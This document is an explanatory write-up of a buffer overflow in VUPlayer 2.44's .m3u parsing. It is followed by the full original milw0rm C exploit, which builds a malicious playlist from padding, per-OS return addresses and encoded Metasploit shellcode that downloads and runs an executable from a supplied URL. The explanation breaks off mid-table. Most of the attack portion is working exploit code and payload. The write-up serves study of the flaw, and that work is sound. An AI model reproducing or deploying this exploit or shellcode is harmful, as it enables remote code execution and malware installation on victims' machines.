VUPlayer 2.44 '.m3u' UNC Name Buffer Overflow Explained

What this paper is

This paper details a buffer overflow vulnerability in VUPlayer versions up to 2.44 when parsing .m3u playlist files. Specifically, it describes how a crafted .m3u file can cause VUPlayer to crash and, more importantly, allows an attacker to execute arbitrary code on the victim's machine. The exploit leverages a vulnerability in how the application handles long strings in .m3u file entries, leading to a controllable overwrite of the program's execution flow.

Simple technical breakdown

The core of the vulnerability lies in how VUPlayer processes a specific part of an .m3u playlist. When a long string is provided in a particular context (likely related to a URL or file path within the playlist), the program doesn't properly check the size of the data it's copying into a fixed-size buffer. This causes the data to spill over, overwriting adjacent memory.

Attackers can exploit this by crafting a malicious .m3u file. This file contains:

1. Padding: A large number of characters (e.g., 'A's) to fill the buffer and reach the critical overwrite point.
2. Return Address Overwrite: A specific address that redirects the program's execution to a location controlled by the attacker. This is often a "jump to ESP" (Execute Stack Pointer) or "push ESP, ret" instruction found in loaded DLLs, which points to the attacker's shellcode.
3. Shellcode: The actual malicious code (e.g., to download and execute a file) that will run once the program's execution flow is redirected.

When VUPlayer loads and processes this .m3u file, the overflow occurs, the program jumps to the attacker-controlled address, and the shellcode is executed.

Complete code and payload walkthrough

The provided C code implements an exploit for the VUPlayer .m3u buffer overflow. Let's break down its components:

alphanum_dax_shellcode

char alphanum_dax_shellcode[] =
        // Skylined's alpha2 alphanumeric decoder
        "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
        // Encoded opcodes
        "Xk6pqJ3zvSYYqv89WL5Qk0tttJny9rzZxk6eM8zKKOKOKOT0PLNylY"
        "Z9O3ymUhliZ9NyJ94RXYnuTRKYmU6TEBzyoaVrSq4RZJmuvrJMNgM1"
        "ojrJ6rkWNYOj3Rvrn7LMoZt4zoHNyXUBMvLZsRtR2KkCLWIPRJuozM"
        "J1iPYVTZQNOmiL3Kd0Kpo6kwTRsdb2yOMmnzpZsxpxOjbxmzPPKOuB"
        "J1uBKoouMJaJRxRXMKnzPXfrMImJQJVrU3b2PnUJQONwuBcyIcMM9P"
        "2QKyMImInyvzQOLThKxOqvjnU5YSwbSqKCNx9P1aY4MILYnyFzqOoz"
        "joiOtYMwwixlsS7inO7izguJsEnYuBqUkCx9KzE6hNsE1NmMOj9Uyh"
        "nWKLQNkmOjMM8ayllYj9OZpYKyyYjjJo9YsVHNSUUBqUkyjjPfHNe9"
        "jie6xNPmoZRy055LPYJL1pXHxKxOjjRFPKhCkptrsKpwOZV9sjaaMo"
        "cVCVu6KnylzMo9xkXvkJxXKMkMZKKLJJzJZ9YNkLHmZjkPKZZMKLKD"
        "kml0JKkLyjXmYfZKYphXMIznjPL7Klm1kLkJlYKlkQZPHmJmhqJKyl"
        "YhkMOin5KFkHKMN5xpkKJKzXHkKPJxLYJLJKjUYdL6kGNyhL8KzuKm"
        "yfzNKG9eJVXxKMzmL6YOxpzU9ln8mI";

• Purpose: This is the shellcode, the actual payload that will be executed on the victim's machine.
• Structure: It's a single, long string of alphanumeric characters. This encoding is crucial because many older systems and applications might filter or reject shellcode containing non-alphanumeric characters (like null bytes, control characters, etc.).
• First Part (TYIIII...ABuJI): This section is identified as a "Skylined's alpha2 alphanumeric decoder." This decoder is a small piece of code that runs first. Its job is to take the subsequent alphanumeric-encoded shellcode and decode it into executable machine instructions. This is a common technique to bypass filters and make shellcode more portable.
• Second Part (Xk6pqJ3...ln8mI): This is the main body of the shellcode, encoded using the alphanumeric scheme. The decoder will transform these characters back into the original, executable opcodes.
• Functionality (Inferred): The comment mentions "win32 download and execute taken from metasploit [ tnx hdm, lion & pita ]". This strongly suggests that the decoded shellcode's purpose is to download a file from a specified URL (likely the one provided as an argument to the exploit) and then execute it. The specific URL for the download would be embedded or passed to this shellcode.

targets struct and array

struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "VUPlayer 2.40 2.41 2.42", 0x01020F4F },   // vu_wma.dll push esp, ret
        { "VUPlayer 2.43 2.44"     , 0x01030F4F },   // vu_wma.dll push esp, ret
	{ "Windows 2k SP 4"        , 0x75031dce },   // ws2_32.dll push esp, ret
	{ "Windows XP SP 0/1"      , 0x71ab7bfb },   // ws2_32.dll jmp esp
        { "Windows XP SP 2 ENG"    , 0x71ab9372 },   // ws2_32.dll push esp, ret
	{ "Windows XP SP 2 ITA"    , 0x77D92CFC },   // user32.dll jmp esp
	{ NULL }
};

• Purpose: This array stores different "return addresses" (pointers) that can be used to redirect execution. These addresses are specific to different versions of Windows and loaded DLLs (Dynamic Link Libraries) that are likely present on a vulnerable system.
• struct retcodes: Defines a structure to hold a platform/version string and a 4-byte unsigned long integer, which represents the memory address.
• targets[]: An array of these structures. Each entry represents a potential target.
  • The platform string is descriptive, indicating the OS version and sometimes the DLL where the target address is found.
  • The addr is the crucial part. It's a memory address that, when jumped to, will execute instructions that typically lead to the shellcode. The comments indicate common patterns:
    • push esp, ret: This instruction sequence is often found in libraries. push esp pushes the current stack pointer onto the stack, and ret pops it off, effectively making esp point to the start of the shellcode that the attacker has placed on the stack.
    • jmp esp: This instruction directly jumps to the current stack pointer, again pointing to the shellcode.
• NULL entry: The last entry with NULL signifies the end of the list.

banner()

int banner() {
  printf("\n       _______         ________           .__        _____          __     \n");
  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
  printf("[i] Title:        \tVUPlayer <= 2.44 m3u Playlist Buffer overflow\n");
  printf("[i] Discovered by:\tGreg Linares\n");
  printf("[i] Exploit by:   \tExpanders\n\n");
  return 0;
}

• Purpose: This function simply prints an ASCII art banner and some introductory information about the exploit (title, discoverer, author) to the console when the program starts. It's purely for informational display.

usage(char *filename)

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <filename> <url> <targ>\n\n",filename);
  printf("       \t<filename>    : Output filename\n");
  printf("       \t<url>         : Complete url of the executable to download\n");
  printf("       \t<targ>        : Target from the list below\n\n");
  printf("Ex:    \t%s exploit.m3u http://www.x0n3-h4ck.org/calc.exe 0\n\n",filename);

  printf("#   \t Platform\n");
  printf("-----------------------------------------------\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t %s\n",i,targets[i].platform);
  printf("-----------------------------------------------\n");
  exit(0);
}

• Purpose: This function displays instructions on how to use the exploit program.
• Functionality:
  • It prints the correct command-line syntax: filename, url, and targ (target index).
  • It explains what each argument means.
  • It provides an example command.
  • Crucially, it iterates through the targets array and prints a numbered list of available platforms/targets, making it easy for the user to select the correct one.
  • exit(0) terminates the program after displaying usage.

encode_alphanum(unsigned char *dest, unsigned char *src, int len)

// Ripped from Skylined's alpha2.c
int encode_alphanum(unsigned char *dest,unsigned char *src,int len){
  char dump[2];
  int   i,n, input, A, B, C, D, E, F;
  char* valid_chars;
  struct timeval tv;
  struct timezone tz;
  memset(dest,0x00,MAX_ENCODED_LEN);
  gettimeofday(&tv, &tz);
  srand((int)tv.tv_sec*1000+tv.tv_usec);
  strcat(src,"\x80"); // Appends a byte to the source string
  valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  for(n=0;n<len;n++) {
    input = src[n]; // Get the current byte from the source
    A = (input & 0xf0) >> 4; // High nibble of the input byte
    B = (input & 0x0f);      // Low nibble of the input byte
    F = B;                   // F is the target low nibble for the first encoded char
    i = rand() % strlen(valid_chars);
    while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); } // Find a valid char whose low nibble matches F
    E = valid_chars[i] >> 4; // High nibble of the found valid char
    D = (A^E);               // D is the XOR of the original high nibble (A) and the found high nibble (E)
    i = rand() % strlen(valid_chars);
    while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); } // Find a valid char whose low nibble matches D
    C = valid_chars[i] >> 4; // High nibble of the second found valid char
    sprintf(dump,"%c%c", (C<<4)+D, (E<<4)+F); // Combine nibbles to form two bytes
    strcat(dest,dump); // Append the two encoded bytes to the destination
  }
  strcat(dest,"A"); // Appends an 'A' at the end
  return 0;
}

• Purpose: This function implements the alphanumeric encoding logic, specifically designed to take arbitrary bytes (like those in a URL) and convert them into a string composed only of alphanumeric characters. This is essential for the shellcode and the URL to be embedded in the .m3u file without causing issues.
• Logic:
  1. Initialization: Seeds the random number generator using the current time for variability. Initializes valid_chars to the allowed alphanumeric set.
  2. Input Processing: It iterates through each byte (input) of the source string (src).
  3. Nibble Splitting: Each byte is split into two 4-bit nibbles: A (high nibble) and B (low nibble).
  4. Encoding Step 1:
     • The low nibble B becomes the target low nibble F for the first encoded character.
     • It randomly selects a character from valid_chars whose low nibble matches F.
     • The high nibble of this selected character is stored in E.
     • A new value D is calculated by XORing the original high nibble A with E.
  5. Encoding Step 2:
     • The value D becomes the target low nibble for the second encoded character.
     • It randomly selects another character from valid_chars whose low nibble matches D.
     • The high nibble of this second selected character is stored in C.
  6. Byte Reconstruction: Two new bytes are constructed:
     • The first byte: (C << 4) + D (combines the high nibble C with the low nibble D).
     • The second byte: (E << 4) + F (combines the high nibble E with the low nibble F).
  7. Output: These two reconstructed bytes are appended to the dest buffer. This process effectively encodes one byte of input into two alphanumeric characters.
  8. Termination: A final 'A' is appended to the destination string. This might be a delimiter or part of the overall encoding scheme.
• Note: The strcat(src,"\x80"); line is peculiar. It appends a byte with value 128 to the source string before encoding. This might be to ensure the last byte of the original URL is properly processed or to add a specific terminator.

main(int argc, char *argv[])

int main(int argc, char *argv[]) {
    FILE *output;
    int position;
    char encoded_url[MAX_ENCODED_LEN];
    char *buffer;
    banner(); // Display banner
    if( (argc != 4) || (strstr("http://",argv[2]) < 0) ) // Check arguments: 3 total, and 2nd arg must start with "http://"
        usage(argv[0]); // If not, show usage and exit
    printf("[+] Target OS is: %s\n",targets[atoi(argv[3])].platform); // Print selected target
    printf("[+] Creating evil buffer...");
    fflush(stdout);
    buffer = (char *) malloc(BUFFSIZE); // Allocate buffer for the exploit payload
    position = 0; // Initialize position tracker
    encode_alphanum(encoded_url,argv[2],strlen(argv[2])); // Encode the provided URL
    memset(buffer,0x41,RET_OFFSET); position += RET_OFFSET; // Fill with 'A's up to RET_OFFSET (1012 bytes)
    memcpy(buffer+position,&targets[atoi(argv[3])].addr,4); position += 4; // Copy the target return address (4 bytes)
    memcpy(buffer+position,alphanum_dax_shellcode,strlen(alphanum_dax_shellcode));  position += strlen(alphanum_dax_shellcode); // Copy the encoded shellcode
    memcpy(buffer+position,encoded_url,strlen(encoded_url)); position += strlen(encoded_url); // Copy the encoded URL
    memset(buffer+position,0x00,1); // Null-terminate the buffer
    printf("done\n");
    printf("[+] Opening file...");
    fflush(stdout);
    if(!(output = fopen(argv[1],"w"))) { // Open the output file for writing
        fprintf(stderr,"error\n");
        return 1;
    }
    printf("done\n");
    printf("[+] Writing stuff into the file\n");
    fprintf(output,BUGSTR,buffer); // Write the exploit string using the BUGSTR format
    printf("[+] Done! %s created!\n",argv[1]);
    fclose(output); // Close the file
    free(buffer); // Free allocated memory
    return 0;
}

• Purpose: This is the main function that orchestrates the exploit generation.
• Argument Handling:
  • It expects exactly three command-line arguments: filename (output .m3u file), url (to download the payload), and targ (index for the target OS/version).
  • It also checks if the provided url starts with "http://".
  • If arguments are incorrect, it calls usage() and exits.
• Buffer Construction:
  1. Allocation: Allocates a large buffer (BUFFSIZE, 5000 bytes) to hold the entire exploit string.
  2. URL Encoding: Calls encode_alphanum to encode the user-provided URL (argv[2]). The result is stored in encoded_url.
  3. Padding: Fills the beginning of the buffer with RET_OFFSET (1012) bytes of 'A' (0x41). This padding is crucial to reach the point in memory where the return address can be overwritten.
  4. Return Address: Copies the selected target's address (targets[atoi(argv[3])].addr) into the buffer, immediately after the padding. This address will be the new instruction pointer.
  5. Shellcode Injection: Appends the alphanum_dax_shellcode after the return address. This is the code that will be executed.
  6. URL Appending: Appends the encoded_url after the shellcode. The shellcode likely expects this URL to be present in memory to know where to download the executable from.
  7. Null Termination: Adds a null byte (0x00) at the very end of the constructed buffer.
• File Output:
  1. File Opening: Opens the specified output filename (argv[1]) in write mode ("w").
  2. Writing Exploit: Uses fprintf(output, BUGSTR, buffer); to write the exploit.
     • BUGSTR is a pre-defined format string: "#EXTM3U\n#EXTINF:470,x0n3-h4ck - omg they kick asses.wma\n%s".
     • This means the generated .m3u file will start with standard .m3u headers, followed by the attacker-controlled buffer (which contains the padding, return address, shellcode, and encoded URL). The "#EXTINF:..." line is likely a placeholder for metadata that VUPlayer might parse, and the %s is where the crafted buffer is inserted.
  3. File Closing: Closes the output file.
• Cleanup: Frees the allocated buffer.

BUGSTR Macro

#define BUGSTR "#EXTM3U\n#EXTINF:470,x0n3-h4ck - omg they kick asses.wma\n%s"

• Purpose: This macro defines the template for the .m3u file content.
• Structure:
  • #EXTM3U: Standard header for an extended M3U playlist.
  • #EXTINF:470,x0n3-h4ck - omg they kick asses.wma: Metadata line. The duration (470) and filename are arbitrary but might be parsed by VUPlayer. This line is likely chosen to appear as a valid media entry.
  • \n: Newline character.
  • %s: This is a placeholder for the actual exploit payload (the buffer constructed in main). The entire crafted buffer will be inserted here.

Mapping list: code fragment/block -> practical purpose

| Code Fragment/Block

Original Exploit-DB Content (Verbatim)

/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   30\11\06    \/      |__|      \/     \/
      
 *   mm.           dM8
 *  YMMMb.       dMM8      _____________________________________
 *   YMMMMb     dMMM'     [                                     ]
 *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
 *      `YMMM  MMM'       [ windows I have yet to look through  ]
 *         "MbdMP         [ Going forward may not be the answer ]
 *     .dMMMMMM.P         [                                     ]
 *    dMM  MMMMMM         [       maybe I should go back        ]
 *    8MMMMMMMMMMI        [_____________________________________]
 *     YMMMMMMMMM                   www.netbunny.org
 *       "MMMMMMP
 *      MxM .mmm
 *      W"W """

[i] Title:              VUPlayer <= 2.44 m3u parsing remote buffer overflow
[i] Discovered by:      Greg Linares  -  glinares.code [aaat] gmail [dooot] com
[i] Exploit by:         Expanders  -  expanders [aaat] gmail [dooot] com
[i] References:         http://www.vuplayer.com/
[i] Greatings:          x0n3-h4ck - netbunny

[ Research diary ]

A classical buffer overflow. if we supply less than 800 bytes of buffer we can trigger an access violation
and we can overwrite SEH handler. btw stack gets too much contaminated with lowecase transforming, section repetitions
and a lot of bad things that make exploiting quite impossible.
Well... if we make it eat a thousand of bytes we can really overwrite some juicy RET sections and full controlling EIP.


[ Timeline ]

Vendor hasn't been informed. Feel free to do it if you want ;)

[ Notes ]

RETcode type: POINTER TO [ESP]
To improve realiability you can search your own RETcodes..

[ Documentation ]

Skylined Alpha2 : www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php

[ Special Thanks ]

Skylined
H D Moore
Greg Linares  <---  He really kicks ass!


[ Links ]

www.x0n3-h4ck.org
www.netbunny.org



*/



#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>

// Exploit internals, change only if you know what you are doing
#define BUGSTR "#EXTM3U\n#EXTINF:470,x0n3-h4ck - omg they kick asses.wma\n%s"
#define BUFFSIZE 5000
#define SC_MAX_SIZE 800
#define MAX_ENCODED_LEN 200

// Offsets
#define RET_OFFSET       1012

int encode_alphanum(unsigned char *src,unsigned char *dest,int len);
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );


// win32 download and execute taken from metasploit [ tnx hdm, lion & pita ]
// encoded using Skylined alpha2 tool
char alphanum_dax_shellcode[] =
        // Skylined's alpha2 alphanumeric decoder
        "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
        // Encoded opcodes
        "Xk6pqJ3zvSYYqv89WL5Qk0tttJny9rzZxk6eM8zKKOKOKOT0PLNylY"
        "Z9O3ymUhliZ9NyJ94RXYnuTRKYmU6TEBzyoaVrSq4RZJmuvrJMNgM1"
        "ojrJ6rkWNYOj3Rvrn7LMoZt4zoHNyXUBMvLZsRtR2KkCLWIPRJuozM"
        "J1iPYVTZQNOmiL3Kd0Kpo6kwTRsdb2yOMmnzpZsxpxOjbxmzPPKOuB"
        "J1uBKoouMJaJRxRXMKnzPXfrMImJQJVrU3b2PnUJQONwuBcyIcMM9P"
        "2QKyMImInyvzQOLThKxOqvjnU5YSwbSqKCNx9P1aY4MILYnyFzqOoz"
        "joiOtYMwwixlsS7inO7izguJsEnYuBqUkCx9KzE6hNsE1NmMOj9Uyh"
        "nWKLQNkmOjMM8ayllYj9OZpYKyyYjjJo9YsVHNSUUBqUkyjjPfHNe9"
        "jie6xNPmoZRy055LPYJL1pXHxKxOjjRFPKhCkptrsKpwOZV9sjaaMo"
        "cVCVu6KnylzMo9xkXvkJxXKMkMZKKLJJzJZ9YNkLHmZjkPKZZMKLKD"
        "kml0JKkLyjXmYfZKYphXMIznjPL7Klm1kLkJlYKlkQZPHmJmhqJKyl"
        "YhkMOin5KFkHKMN5xpkKJKzXHkKPJxLYJLJKjUYdL6kGNyhL8KzuKm"
        "yfzNKG9eJVXxKMzmL6YOxpzU9ln8mI";


struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "VUPlayer 2.40 2.41 2.42", 0x01020F4F },   // vu_wma.dll push esp, ret
        { "VUPlayer 2.43 2.44"     , 0x01030F4F },   // vu_wma.dll push esp, ret
	{ "Windows 2k SP 4"        , 0x75031dce },   // ws2_32.dll push esp, ret   [Tnx to metasploit]
	{ "Windows XP SP 0/1"      , 0x71ab7bfb },   // ws2_32.dll jmp esp         [Tnx to metasploit]
        { "Windows XP SP 2 ENG"    , 0x71ab9372 },   // ws2_32.dll push esp, ret   [Tnx to metasploit]
	{ "Windows XP SP 2 ITA"    , 0x77D92CFC },   // user32.dll jmp esp
	{ NULL }
};

int banner() {
  printf("\n       _______         ________           .__        _____          __     \n");
  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
  printf("[i] Title:        \tVUPlayer <= 2.44 m3u Playlist Buffer overflow\n");
  printf("[i] Discovered by:\tGreg Linares\n");
  printf("[i] Exploit by:   \tExpanders\n\n");
  return 0;
}

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <filename> <url> <targ>\n\n",filename);
  printf("       \t<filename>    : Output filename\n");
  printf("       \t<url>         : Complete url of the executable to download\n");
  printf("       \t<targ>        : Target from the list below\n\n");
  printf("Ex:    \t%s exploit.m3u http://www.x0n3-h4ck.org/calc.exe 0\n\n",filename);
  
  printf("#   \t Platform\n");
  printf("-----------------------------------------------\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t %s\n",i,targets[i].platform);
  printf("-----------------------------------------------\n");
  exit(0);
}


int main(int argc, char *argv[]) {
    FILE *output;
    int position;
    char encoded_url[MAX_ENCODED_LEN];
    char *buffer;
    banner();
    if( (argc != 4) || (strstr("http://",argv[2]) < 0) )
        usage(argv[0]);
    printf("[+] Target OS is: %s\n",targets[atoi(argv[3])].platform);
    printf("[+] Creating evil buffer...");
    fflush(stdout);
    buffer = (char *) malloc(BUFFSIZE);
    position = 0;
    encode_alphanum(encoded_url,argv[2],strlen(argv[2]));
    memset(buffer,0x41,RET_OFFSET); position += RET_OFFSET;
    memcpy(buffer+position,&targets[atoi(argv[3])].addr,4); position += 4;
    memcpy(buffer+position,alphanum_dax_shellcode,strlen(alphanum_dax_shellcode));  position += strlen(alphanum_dax_shellcode);
    memcpy(buffer+position,encoded_url,strlen(encoded_url)); position += strlen(encoded_url);
    memset(buffer+position,0x00,1);
    printf("done\n");
    printf("[+] Opening file...");
    fflush(stdout);
    if(!(output = fopen(argv[1],"w"))) {
        fprintf(stderr,"error\n");
        return 1;
    }
    printf("done\n");
    printf("[+] Writing stuff into the file\n");
    fprintf(output,BUGSTR,buffer);
    printf("[+] Done! %s created!\n",argv[1]);
    fclose(output);
    free(buffer);
    return 0;
}

// Ripped from Skylined's alpha2.c
int encode_alphanum(unsigned char *dest,unsigned char *src,int len){
  char dump[2];
  int   i,n, input, A, B, C, D, E, F;
  char* valid_chars;
  struct timeval tv;
  struct timezone tz;
  memset(dest,0x00,MAX_ENCODED_LEN);
  gettimeofday(&tv, &tz);
  srand((int)tv.tv_sec*1000+tv.tv_usec);
  strcat(src,"\x80");
  valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  for(n=0;n<len;n++) {
    input = src[n];
    A = (input & 0xf0) >> 4;
    B = (input & 0x0f);
    F = B;
    i = rand() % strlen(valid_chars);
    while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
    E = valid_chars[i] >> 4;
    D = (A^E);
    i = rand() % strlen(valid_chars);
    while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
    C = valid_chars[i] >> 4;
    sprintf(dump,"%c%c", (C<<4)+D, (E<<4)+F);
    strcat(dest,dump);
  }
  strcat(dest,"A");
  return 0;
}

// milw0rm.com [2006-11-30]